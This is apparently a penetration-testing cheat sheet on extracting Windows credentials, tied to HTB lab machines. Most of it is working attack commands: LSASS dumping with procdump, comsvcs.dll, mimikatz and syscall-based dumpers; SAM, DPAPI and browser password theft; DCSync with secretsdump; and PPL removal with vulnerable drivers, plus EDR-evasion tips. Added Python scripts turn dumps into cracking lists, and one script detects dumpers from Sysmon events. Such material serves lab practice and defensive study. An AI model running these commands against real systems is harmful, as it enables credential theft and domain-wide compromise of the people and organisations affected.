
LSASS & Credential Extraction

#Overview

The Local Security Authority Subsystem Service (LSASS) keeps the credential material of every active logon session in memory so that Windows can authenticate on the user's behalf without prompting again (single sign-on). Extracting it, NTLM hashes, Kerberos keys and tickets, and plaintext passwords where WDigest caching is still enabled, is one of the highest-value post-exploitation techniques on Windows (MITRE ATT&CK T1003.001). Combined with SAM/SYSTEM hive extraction, DPAPI decryption and NTDS.dit access, it provides comprehensive credential access.

#Prerequisites

  • Local Administrator or SYSTEM on the target (an administrator token carries SeDebugPrivilege, which has to be enabled before LSASS can be opened; privilege::debug and procdump do this for you)
  • Ability to run tools on the target, or remote extraction over SMB/WinRM (lsassy, secretsdump)

#Detection & Enumeration

# Is LSASS running as a Protected Process Light? (1 = enabled, 2 = enabled without UEFI lock on Windows 11 22H2+, absent/0 = off)
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL

# Credential Guard configuration: LsaCfgFlags (1 = enabled with UEFI lock, 2 = enabled without lock, 0/absent = off).
# The HypervisorEnforcedCodeIntegrity\Enabled value is HVCI, a different VBS feature, not Credential Guard.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags
# When set by GPO the same value lives under HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard

# What VBS is actually running right now: SecurityServicesRunning contains 1 for Credential Guard and 2 for HVCI
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Select-Object VirtualizationBasedSecurityStatus, SecurityServicesConfigured, SecurityServicesRunning
POWERSHELL

#Exploitation / Execution

#LSASS Memory Dumping

:: Method 1: Procdump (Microsoft-signed, but Defender flags procdump targeting lsass on sight)
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp

:: Method 2: comsvcs.dll MiniDump export (built-in, nothing dropped on disk; run from an elevated prompt so SeDebugPrivilege is available)
:: Find the LSASS PID first
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <lsass_PID> C:\temp\lsass.dmp full

:: Method 3: Task Manager (GUI)
:: Details tab → right-click lsass.exe → Create dump file (written to %TEMP%\lsass.DMP)

:: Method 4: Mimikatz (reads LSASS in memory, no dump file)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
CMD

#Extracting from LSASS Dump Offline

# On the attacker machine, parse the minidump with pypykatz (the subcommand is "lsa minidump"; there is no "parse" command)
pypykatz lsa minidump lsass.dmp

# Or with Mimikatz on a Windows box of the same architecture (and ideally the same OS major version) as the source
mimikatz # sekurlsa::minidump C:\temp\lsass.dmp
mimikatz # sekurlsa::logonpasswords
BASH

#SAM & SYSTEM Hive Extraction

:: Method 1: Registry save (admin, or just SeBackupPrivilege; save hklm\security the same way for LSA secrets and cached domain creds)
reg save hklm\sam C:\temp\sam.bak
reg save hklm\system C:\temp\system.bak

:: Method 2: Volume Shadow Copy (admin). "vssadmin create shadow" exists only on Server SKUs; on client Windows create the shadow with wmic shadowcopy instead
:: The shadow number in the GLOBALROOT path comes from vssadmin's output and is not always 1
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\sam.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.bak

:: Method 3: diskshadow + robocopy /b (SeBackupPrivilege is enough, so Backup Operators works)
:: Put the DISKSHADOW lines in a script with CRLF line endings and run "diskshadow /s script.txt", or type them interactively
DISKSHADOW> set context persistent nowriters
DISKSHADOW> add volume C: alias vss1
DISKSHADOW> create
DISKSHADOW> expose %vss1% Z:
DISKSHADOW> exit
:: copy with backup semantics from the exposed shadow
robocopy /b Z:\Windows\System32\config C:\temp SAM SYSTEM

:: Parse offline with secretsdump (Kali package name; a pip install provides secretsdump.py). Add -security security.bak if you saved that hive too
impacket-secretsdump -sam sam.bak -system system.bak LOCAL
CMD

#Mimikatz Key Commands

mimikatz # privilege::debug

:: Dump all credentials from LSASS
mimikatz # sekurlsa::logonpasswords

:: Dump Kerberos tickets
mimikatz # sekurlsa::tickets /export

:: Dump cached domain credentials
mimikatz # lsadump::cache

:: Dump SAM database
mimikatz # lsadump::sam

:: Dump domain credentials from NTDS.dit (on DC)
mimikatz # lsadump::lsa /inject

:: Dump DCSync (requires Replication permissions)
mimikatz # lsadump::dcsync /domain:htb.local /all /csv
CMD

#DPAPI (Data Protection API)

:: Credential Manager blobs (hidden files, hence /a), each encrypted with one of the user's DPAPI master keys
dir /a /s /b C:\Users | findstr /i "\\Microsoft\\Credentials\\"
:: The master keys themselves live in %APPDATA%\Microsoft\Protect\<SID>\<GUID>; sekurlsa::dpapi lists the ones already decrypted in LSASS

:: Decrypt a credential blob with Mimikatz (needs the matching master key: from the LSASS cache, /masterkey:<hex>, or derived from the user's password and SID)
mimikatz # dpapi::cred /in:C:\Users\user\AppData\Local\Microsoft\Credentials\{GUID}

:: Decrypt Chrome saved passwords (run as the user or supply the master key; Chrome 80+ also needs the AES key wrapped in "Local State", which mimikatz reads via /state)
mimikatz # dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

:: Domain DPAPI backup key (run against a DC as Domain Admin; decrypts every domain user's master keys offline)
mimikatz # lsadump::backupkeys /system:<dc-fqdn> /export
CMD

#Credential Manager

:: List stored credentials of the current user (target, user name, type; no secrets)
cmdkey /list

:: Vaultcmd enumerates a vault ("Windows Credentials" here; "Web Credentials" holds IE/Edge-stored logins)
vaultcmd /listcreds:"Windows Credentials" /all
CMD

#Browser Credential Extraction

# Chrome/Edge/Brave: SharpChromium, run in the user's context, decrypts Login Data, cookies and history with the logged-on user's DPAPI key
# Offline: copy "Login Data" and "Local State" and decrypt with the user's DPAPI master key (or the domain backup key) via dpapi::chrome
POWERSHELL

#NTDS.dit Extraction from Domain Controller

# Remote, via DCSync (needs replication rights, in practice Domain Admin); -just-dc-ntlm skips Kerberos keys and cleartext
impacket-secretsdump 'domain.local/admin:password@10.10.10.10' -just-dc-ntlm

# Same with pass-the-hash (the LM half is the empty-LM constant aad3b435b51404eeaad3b435b51404ee)
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:3f79bb9ef926e3d4e7c5f15e5f0e0c6a 'domain.local/admin@10.10.10.10'

# Local extraction on the DC via an ntdsutil IFM snapshot (writes "Active Directory\ntds.dit" and "registry\SYSTEM" under C:\ntds_dump)
ntdsutil "activate instance ntds" "ifm" "create full C:\ntds_dump" quit quit

# Then parse offline (-history adds password history, -user-status marks disabled accounts)
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
BASH
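Triage before cracking: an NTDS dump is mostly machine accounts, disabled users and history entries. The following is an added example, not part of this page or of Impacket, that parses secretsdump's `domain\user:rid:lmhash:nthash:::` lines, ignores password-history rows, and reports blank passwords, accounts still carrying an LM hash, NT-hash reuse between human accounts and the krbtgt key. The sample output and every hash in it are constructed, except the well-known empty-string constants and the NT hash of "password".

```python
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank password

# domain\user:rid:lmhash:nthash:::  (secretsdump omits the domain prefix on some rows, e.g. krbtgt)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)
HISTORY_RE = re.compile(r"_history\d+$", re.I)  # naming used by secretsdump -history


def parse_secretsdump(text: str) -> List[Dict]:
    """One record per NTLM hash line; banners, Kerberos keys and cleartext rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        r = m.groupdict()
        r["rid"] = int(r["rid"])
        r["lm"], r["nt"] = r["lm"].lower(), r["nt"].lower()
        r["history"] = bool(HISTORY_RE.search(r["user"]))
        r["machine"] = r["user"].endswith("$")
        rows.append(r)
    return rows


def triage(rows: List[Dict]) -> Dict:
    """What is worth acting on: blank passwords, LM hashes, NT-hash reuse, the krbtgt key."""
    current = [r for r in rows if not r["history"]]
    by_nt = defaultdict(list)
    for r in current:
        if not r["machine"] and r["nt"] != EMPTY_NT:  # machine passwords are random; reuse there is meaningless
            by_nt[r["nt"]].append(r["user"])
    return {
        "blank_password": sorted(r["user"] for r in current if r["nt"] == EMPTY_NT and not r["machine"]),
        "lm_present": sorted(r["user"] for r in current if r["lm"] != EMPTY_LM),  # crack these first (hashcat -m 3000)
        "reuse": {h: sorted(users) for h, users in by_nt.items() if len(users) > 1},
        "history_entries": sum(1 for r in rows if r["history"]),
        "krbtgt_nt": next((r["nt"] for r in current if r["user"].lower() == "krbtgt"), None),  # golden ticket key
    }


# Constructed sample in the shape of secretsdump's DRSUAPI output.
SAMPLE = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e3a1f0c5b7d2e4a6c8b0d1f3e5a7c9b:::
htb.local\svc_sql:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
htb.local\j.doe:1105:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
htb.local\j.doe_history0:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
htb.local\legacy.user:1107:5d8fb2cd1c2bb8b1aad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    for key, value in triage(parse_secretsdump(SAMPLE)).items():
        print(f"{key}: {value}")
```

Accounts sharing an NT hash share a password, so cracking one hash (or a single pass-the-hash) covers the whole cluster; a non-empty LM hash means the password is at most 14 characters and falls to hashcat -m 3000 in minutes.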

#nanodump

:: nanodump (github.com/fortra/nanodump): dumps LSASS through direct/indirect syscalls and writes the minidump itself, never calling MiniDumpWriteDump
nanodump.exe --write C:\temp\lsass.dmp
:: By default the file is written with a corrupted signature so on-disk scanners ignore it; repair it before parsing (scripts/restore_signature in the repo) or pass --valid
:: Handle acquisition is selectable: --fork (dump a cloned LSASS, only PROCESS_CREATE_PROCESS is requested on lsass itself), --snapshot (PssCaptureSnapshot), --dup (duplicate an existing handle); a BOF build exists for Cobalt Strike
:: The gain is against user-mode hooks, GrantedAcc filters that only look for VM_READ, and file scanners; kernel callbacks still see the handle, so it is harder to detect than procdump or comsvcs.dll, not invisible
CMD

#lsassy

# lsassy (github.com/Hackndo/lsassy) as a NetExec module: dump and parse LSASS remotely in one step
nxc smb <target> -u administrator -p pass -M lsassy
# The default dump method is comsvcs.dll, so no binary is uploaded; other methods (procdump, dumpert, nanodump) drop a tool on the target
# Executes the dump via WMI or a scheduled task over SMB, parses it over the C$ share with pypykatz, then deletes the dump file
BASH

#Dumpert

:: Dumpert (github.com/outflanknl/Dumpert): LSASS dump via direct syscalls and ntdll unhooking
:: Opens LSASS with direct syscalls (NtOpenProcess and friends, syscall numbers selected per OS build), restores hooked ntdll stubs, then calls MiniDumpWriteDump
:: Ships as an EXE and as a reflective DLL with an Aggressor script for injection from a C2
:: Defeats user-mode API hooks only: the handle to LSASS and the dbghelp frames on the call stack remain visible to kernel telemetry
CMD

#handlekatz

:: HandleKatz (github.com/codewhitesec/HandleKatz): position-independent LSASS dumper built on handle cloning
:: Locates an existing handle to LSASS in another process and duplicates it instead of calling OpenProcess, then writes an obfuscated minidump
:: Avoids the OpenProcess-from-a-new-process pattern that most ProcessAccess detections key on; kernel object callbacks also see handle duplication, so it hides from hooks and naive rules, not from kernel telemetry
CMD

#Complete comsvcs.dll MiniDump Workflow

:: Complete comsvcs.dll MiniDump workflow
:: Step 1: Find the LSASS PID
tasklist /fi "imagename eq lsass.exe"
:: Output: lsass.exe    <PID>    Services    0    11,xxx K

:: Step 2: Dump using the comsvcs.dll MiniDump export (built-in, no tool drop; elevated prompt required)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
:: "full" is the only supported option and requests a full-memory minidump

:: Step 3: Transfer lsass.dmp to the attacker machine (the file is typically 50 to 150 MB)

:: Step 4: Parse offline
pypykatz lsa minidump lsass.dmp
:: Or on Windows with Mimikatz (same architecture as the source host):
mimikatz # sekurlsa::minidump C:\temp\lsass.dmp
mimikatz # sekurlsa::logonpasswords
CMD

#Mimikatz Output Interpretation

sekurlsa::logonpasswords prints one block per logon session (Authentication Id, User Name, Domain, Logon Time, then one sub-block per credential provider: msv, tspkg, wdigest, kerberos, ssp, credman). The NTLM and SHA1 values sit under msv; a plaintext Password only appears under wdigest (or tspkg/kerberos) when WDigest caching is enabled. Kerberos encryption keys come from sekurlsa::ekeys, not from logonpasswords. The fields you will act on:

Field                   | Description                                                  | Use
NTLM                    | NT hash: MD4 of the UTF-16LE password                        | Pass-the-Hash, offline cracking (hashcat -m 1000)
SHA1                    | SHA-1 of the password, stored by MSV next to the NT hash     | Rarely useful on its own
aes256-cts-hmac-sha1-96 | Kerberos AES-256 key (sekurlsa::ekeys)                       | Overpass-the-Hash / pass-the-key, forging tickets with AES (quieter than RC4)
aes128-cts-hmac-sha1-96 | Kerberos AES-128 key (sekurlsa::ekeys)                       | Overpass-the-Hash
des-cbc-md5             | Legacy DES key                                               | Rarely useful
DPAPI                   | DPAPI user key derived from the password, shown under msv    | Decrypting the user's DPAPI master keys, hence Credential Manager and browser blobs

Key indicators:

  • msv shows "LSA Isolated Data" instead of an NTLM value, or the NTLM is all zeros: Credential Guard is active and the dump contains no usable domain hashes
  • mimikatz fails before printing any session ("Handle on memory (0x00000005)" right after privilege::debug) and procdump/comsvcs get Access Denied: RunAsPPL is blocking the OpenProcess call
  • Several blocks for the same user are separate logon sessions; compare their NTLM values and Logon Time, a session that predates a password change carries a stale hash
  • "(null)" passwords are normal on Windows 8.1/Server 2012 R2 and later, where WDigest caching is off unless UseLogonCredential=1 has been set
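Reading a dump with dozens of sessions by eye is error-prone, so the indicators above are easier to apply as code. The following is an added example, not part of this page or of mimikatz: it parses sekurlsa::logonpasswords text into one record per session, classifies each as usable, Credential-Guard-isolated or lacking an MSV credential, counts sessions per account, and emits unique hashcat -m 1000 lines while skipping machine accounts. The sample output is constructed to mimic the mimikatz layout (Credential Guard entries modelled on the "LSA Isolated Data" marker); the only real value in it is the NT hash of "password".

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")  # "User Name         : j.doe"
PROVIDER_RE = re.compile(r"^\s+(msv|tspkg|wdigest|kerberos|ssp|credman|cloudap)\s*:\s*$")
ATTR_RE = re.compile(r"^\s+\*\s+(\w+)\s*:\s*(.*)$")  # "  * NTLM       : 8846f7..."


@dataclass
class LogonSession:
    auth_id: str
    user: str = ""
    domain: str = ""
    ntlm: Optional[str] = None
    password: Optional[str] = None  # first non-(null) Password seen (wdigest/kerberos/tspkg)
    isolated: bool = False  # msv block shows "LSA Isolated Data": Credential Guard keeps the secret in LsaIso

    def status(self) -> str:
        if self.isolated or self.ntlm == "0" * 32:
            return "credential-guard"
        if self.ntlm is None:
            return "no-msv"  # network logons and some service sessions carry no MSV primary credential
        return "usable"


def parse_logonpasswords(text: str) -> List[LogonSession]:
    """Split sekurlsa::logonpasswords output into one record per logon session."""
    sessions, cur, provider = [], None, ""
    for line in text.splitlines():
        line = line.rstrip()
        if line.startswith("Authentication Id"):
            cur = LogonSession(auth_id=line.split(":", 1)[1].strip())
            sessions.append(cur)
            provider = ""
        elif not line or cur is None:
            continue
        elif (m := PROVIDER_RE.match(line)):
            provider = m.group(1)
        elif "LSA Isolated Data" in line:
            cur.isolated = True
        elif (m := ATTR_RE.match(line)):
            key, val = m.group(1).lower(), m.group(2).strip()
            if val == "(null)":
                continue
            if provider == "msv" and key == "ntlm":
                cur.ntlm = val.lower()
            elif key == "password" and cur.password is None:
                cur.password = val
        elif not line[0].isspace() and (m := HEADER_RE.match(line)):
            key, val = m.group(1).strip().lower(), m.group(2).strip()
            if key == "user name":
                cur.user = val
            elif key == "domain":
                cur.domain = val
    return sessions


def sessions_per_account(sessions: List[LogonSession]) -> Counter:
    """More than one session per account is normal; if their NTLM values differ, the older one is stale."""
    return Counter(f"{s.domain}\\{s.user}".lower() for s in sessions)


def hashcat_lines(sessions: List[LogonSession]) -> List[str]:
    """Unique 'DOMAIN\\user:nthash' lines for hashcat -m 1000 --username. Machine accounts ($) are skipped:
    their passwords are random and uncrackable, though the hash itself still works for pass-the-hash."""
    lines: List[str] = []
    for s in sessions:
        line = f"{s.domain}\\{s.user}:{s.ntlm}"
        if s.status() == "usable" and not s.user.endswith("$") and line not in lines:
            lines.append(line)
    return lines


# Constructed sample shaped like sekurlsa::logonpasswords output.
SAMPLE = r"""
Authentication Id : 0 ; 997 (00000000:000003e5)
User Name         : j.doe
Domain            : HTB
        msv :
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
        wdigest :
         * Password   : password

Authentication Id : 0 ; 1234 (00000000:000004d2)
User Name         : j.doe
Domain            : HTB
        msv :
         * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
        wdigest :
         * Password   : (null)

Authentication Id : 0 ; 2048 (00000000:00000800)
User Name         : svc_backup
Domain            : HTB
        msv :
         * LSA Isolated Data: NtlmHash

Authentication Id : 0 ; 999 (00000000:000003e7)
User Name         : WS01$
Domain            : HTB
        msv :
         * NTLM       : 0123456789abcdef0123456789abcdef
"""
```

Feed `hashcat_lines()` output to hashcat with `--username`, and keep the machine-account hashes separately: they are useless for cracking but a workstation account hash can still authenticate as that computer.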

#Credential Guard and RunAsPPL

# Credential Guard: the dump itself succeeds, but NTLM hashes, Kerberos keys and TGTs of domain logons are held by the isolated LSA process (LsaIso.exe, running in VTL1) and never appear in LSASS memory; mimikatz prints "LSA Isolated Data" in their place
# Detection: LsaCfgFlags (1 = on with UEFI lock, 2 = on without lock) and SecurityServicesRunning from Win32_DeviceGuard (contains 1)
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags
# No LSASS dumper gets around this. What remains: local SAM accounts and LSA secrets (not protected), DPAPI master keys, and, with replication rights, DCSync against a DC instead of dumping endpoints at all:
impacket-secretsdump 'domain.local/admin:pass@dc-ip' -just-dc

# RunAsPPL: LSASS runs as a Protected Process Light, so OpenProcess from any non-PPL process fails with ACCESS_DENIED and every user-mode dumper (mimikatz, procdump, comsvcs.dll, nanodump) stops before reading a byte
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL
# 1 = enabled (with a UEFI lock variable on UEFI systems), 2 = enabled without UEFI lock (Windows 11 22H2+)
# Removing the protection needs kernel code: mimikatz's signed mimidrv.sys (!+ then !processprotect /process:lsass.exe /remove) or PPLKiller (https://github.com/Mattiwatti/PPLKiller), which loads the vulnerable signed RTCore64.sys driver. Both need local admin (SeLoadDriverPrivilege) and are loud: the driver load is logged and driver blocklists/HVCI may refuse it
# Setting RunAsPPL to 0 only takes effect after a reboot, and not at all while the UEFI lock variable exists
POWERSHELL

#Common Pitfalls

  • ⚠️ RunAsPPL blocks every user-mode dumper up front (Access Denied on OpenProcess); removing it needs a kernel driver (mimidrv, PPLKiller), and a registry change alone only takes effect after a reboot and only when no UEFI lock variable is set
  • ⚠️ Credential Guard lets the dump succeed but strips domain NTLM hashes and Kerberos keys out of it; fall back to SAM and LSA secrets, DPAPI, or DCSync with sufficient rights
  • ⚠️ Defender and EDR flag procdump and mimikatz on sight; comsvcs.dll or syscall-based dumpers (nanodump, Dumpert, HandleKatz) shrink the on-disk and user-mode footprint, the process-access telemetry remains
  • ⚠️ Two sessions of the same user can hold different hashes when the password changed mid-session; the older one is stale, so verify a hash (e.g. with nxc) before building on it
  • ⚠️ DCSync requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain naming context (Domain Admins, Enterprise Admins and domain controllers hold them by default)

#OPSEC Considerations

  • 🛡️ Opening LSASS is recorded by Sysmon Event ID 10 (ProcessAccess, TargetImage lsass.exe, GrantedAccess typically 0x1010, 0x1410 or 0x1fffff, CallTrace showing dbgcore/dbghelp or unbacked frames); native auditing only logs it (4656/4663) if a SACL has been placed on the process object. Defender and EDR alert on the handle regardless of which tool requested it
  • 🛡️ Procdump, rundll32 and mimikatz all appear in Event ID 4688 / Sysmon Event 1 process-creation logs; with command-line auditing enabled, "comsvcs.dll ... MiniDump" and "-ma lsass" are trivially signatured
  • 🛡️ comsvcs.dll MiniDump avoids dropping a binary but still calls MiniDumpWriteDump and opens LSASS with full access, so the same ProcessAccess telemetry catches it
  • 🛡️ reg save of SAM/SECURITY/SYSTEM is logged as 4656/4663 on the registry key when Object Access auditing and a SACL are configured; the saved hive on disk is a second artifact
  • 🛡️ OS Credential Dumping (ATT&CK T1003) is among the most heavily signatured techniques in enterprise EDR; assume the attempt raises an alert and plan the follow-on steps before running it
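The telemetry listed above is easiest to reason about as the detection logic a blue team would run. The following is an added example, not part of this page or of any EDR product: it applies that logic to Sysmon Event 10 (ProcessAccess) and Event 1 (ProcessCreate) records, flags handles to LSASS that carry PROCESS_VM_READ or full access from non-allowlisted images, escalates on dbgcore/dbghelp or unbacked frames in the CallTrace, and matches the command lines of the dumpers on this page. The events, the allowlist and the flat dict field names are constructed for the example (Sysmon's XML EventData is flattened here).

```python
import re
from typing import Dict, List, Optional, Tuple

PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF
# Images that legitimately open LSASS with read access on a stock host. Assumption for the example:
# tune to your AV/EDR agents, and match on full path plus signer in production, never on basename alone.
BENIGN_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe", "msmpeng.exe"}
# Command-line signatures for the dumpers on this page (Sysmon 1 / Security 4688 with command-line auditing).
CMDLINE_SIGNATURES: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"comsvcs(\.dll)?\b.*\bminidump\b", re.I), "comsvcs.dll MiniDump export"),
    (re.compile(r"procdump.*\blsass\b", re.I), "procdump against lsass"),
    (re.compile(r"\b(sekurlsa|lsadump)::", re.I), "mimikatz module invocation"),
    (re.compile(r"\bnanodump\b", re.I), "nanodump"),
]


def classify_process_access(ev: Dict) -> Optional[str]:
    """Sysmon Event 10: reason string when a non-allowlisted process gets a readable handle to LSASS."""
    if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    src = ev["SourceImage"].lower()
    if src in BENIGN_SOURCES or src.rsplit("\\", 1)[-1] in BENIGN_SOURCES:
        return None
    access = int(ev["GrantedAccess"], 16)
    if access == PROCESS_ALL_ACCESS:
        reasons = ["PROCESS_ALL_ACCESS on lsass"]
    elif access & PROCESS_VM_READ:
        reasons = [f"PROCESS_VM_READ in 0x{access:X}"]
    else:
        return None  # query-only handles (0x1000, 0x1400) are routine noise
    trace = ev.get("CallTrace", "")
    if re.search(r"dbg(core|help)\.dll", trace, re.I):
        reasons.append("MiniDumpWriteDump on the stack")  # procdump, comsvcs.dll, Task Manager, Dumpert
    if "UNKNOWN" in trace:
        reasons.append("call frame in unbacked memory")  # direct syscalls or shellcode; also .NET JIT, so corroborate
    return "; ".join(reasons)


def classify_command_line(ev: Dict) -> Optional[str]:
    """Sysmon Event 1 / Security 4688: match the command line against known dumper invocations."""
    if ev.get("EventID") not in (1, 4688):
        return None
    for pattern, label in CMDLINE_SIGNATURES:
        if pattern.search(ev.get("CommandLine", "")):
            return label
    return None


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for every event that should raise an alert."""
    hits = []
    for i, ev in enumerate(events):
        reason = classify_process_access(ev) or classify_command_line(ev)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample records, flattened from Sysmon's EventData fields.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7\MsMpEng.exe+1a2b3"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2c0be"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\SYSTEM32\dbgcore.dll+1a6b|C:\Windows\System32\comsvcs.dll+5f21"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\nd.exe", "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1010", "CallTrace": r"UNKNOWN(00000234A1B20047)|UNKNOWN(00000234A1B201C3)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\temp\lsass.dmp full"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for index, reason in scan(SAMPLE_EVENTS):
        print(f"event {index}: {reason}")
```

The two event types cover different evasions: a renamed procdump or a comsvcs invocation hidden behind an encoded command still produces the Event 10 handle with a dbgcore frame, while a --fork-style nanodump that never takes a VM_READ handle on lsass only shows up through the command line or the CREATE_PROCESS handle, which is why production rules key on both and on the parent/child chain.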

#Post-Exploitation Value

LSASS credential extraction provides the highest return on investment in post-exploitation. A single dump can yield plaintext passwords, NTLM hashes, and Kerberos tickets for all recently authenticated users, enabling lateral movement across the entire domain.

#Tool References

Tool                  | Link
Mimikatz              | https://github.com/gentilkiwi/mimikatz
Procdump              | https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
Impacket secretsdump  | https://github.com/fortra/impacket
Pypykatz              | https://github.com/skelsec/pypykatz
SharpChromium         | https://github.com/djhohnstein/SharpChromium
nanodump              | https://github.com/fortra/nanodump
lsassy                | https://github.com/Hackndo/lsassy
Dumpert               | https://github.com/outflanknl/Dumpert
HandleKatz            | https://github.com/codewhitesec/HandleKatz
PPLKiller             | https://github.com/Mattiwatti/PPLKiller

#Source Machines

  • Forest (Easy, AD)
  • Cascade (Medium, AD/Windows)
  • Blackfield (Medium, AD/Windows)
  • Jeeves (Medium, Windows)
  • Support (Easy, Windows)
  • StreamIO (Hard, Windows)